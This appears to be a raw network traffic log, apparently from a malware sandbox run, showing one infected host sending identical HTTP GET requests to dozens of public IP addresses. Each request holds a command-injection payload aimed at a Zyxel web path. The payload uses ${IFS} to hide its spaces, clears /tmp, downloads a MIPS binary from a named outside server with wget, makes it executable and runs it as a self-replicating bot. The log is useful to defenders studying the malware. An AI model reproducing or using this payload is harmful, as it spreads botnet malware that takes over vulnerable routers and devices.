                                      Jan 14, 2024 15:51:00.635617971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7966192.168.2.1449826184.106.232.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635669947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7967192.168.2.1457620149.189.216.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635695934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7968192.168.2.1448456199.20.130.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635741949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7969192.168.2.1447124213.151.80.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635767937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7970192.168.2.145783895.52.154.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635824919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7971192.168.2.1455026183.54.66.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635867119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7972192.168.2.143481870.29.225.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635901928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7973192.168.2.1456570111.55.88.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635952950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7974192.168.2.145030027.80.87.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635991096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7975192.168.2.1438358110.211.113.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636018991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7976192.168.2.1436562208.169.120.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636065960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7977192.168.2.1450108173.90.192.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636106968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7978192.168.2.1450432113.100.51.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636142015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7979192.168.2.1440654196.251.174.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636172056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7980192.168.2.1442472195.38.206.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636229038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7981192.168.2.1439772212.222.244.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636262894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7982192.168.2.1439708109.22.68.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636317968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7983192.168.2.1444160101.95.71.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636351109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7984192.168.2.143412460.200.188.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636395931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7985192.168.2.1441724104.237.107.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636431932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7986192.168.2.1450548109.12.196.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636465073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7987192.168.2.144797087.106.230.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636507034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7988192.168.2.1451890175.58.229.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636540890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7989192.168.2.144105438.209.140.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636588097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7990192.168.2.1453854183.211.48.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636630058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7991192.168.2.143593464.233.218.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636679888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7992192.168.2.1444338138.101.160.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636717081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7993192.168.2.145456674.251.226.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636759996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7994192.168.2.144498686.86.146.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636791945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7995192.168.2.145709885.171.23.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636835098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7996192.168.2.1436814153.125.247.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636878014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7997192.168.2.1446818108.238.239.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636918068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7998192.168.2.143393094.114.3.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.636970043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7999192.168.2.1441762170.200.60.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637011051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8000192.168.2.1456942139.142.159.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637054920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8001192.168.2.1457796191.81.194.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637114048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8002192.168.2.1449186186.2.76.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637140989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8003192.168.2.143509051.157.229.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637182951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8004192.168.2.1433800222.15.212.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637232065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8005192.168.2.1443492128.215.237.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637240887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8006192.168.2.143310894.158.157.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637290001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8007192.168.2.145450854.60.52.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637332916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8008192.168.2.1458422147.247.66.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637370110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8009192.168.2.1436566148.206.236.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637418985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8010192.168.2.1454768186.92.174.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637456894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8011192.168.2.144231482.123.134.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637497902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8012192.168.2.144853832.154.210.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637568951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8013192.168.2.145823827.239.88.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637609005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8014192.168.2.143984043.53.154.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637650967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8015192.168.2.1455044158.203.162.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637692928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8016192.168.2.144634042.167.98.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637729883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8017192.168.2.1438778172.217.225.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637799978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8018192.168.2.1447194118.77.180.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637820959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8019192.168.2.1434540144.48.56.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637857914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8020192.168.2.1439182128.248.250.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637903929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8021192.168.2.1438720191.63.123.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637927055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8022192.168.2.143939884.47.238.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637964010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8023192.168.2.1437648136.122.225.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.637995958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8024192.168.2.1439386184.198.102.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638051033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8025192.168.2.1436588217.123.50.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638087034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8026192.168.2.143841039.70.63.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638133049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8027192.168.2.1436150171.77.39.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638183117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8028192.168.2.1434778152.2.202.199443
                                      TimestampBytes transferredDirectionData
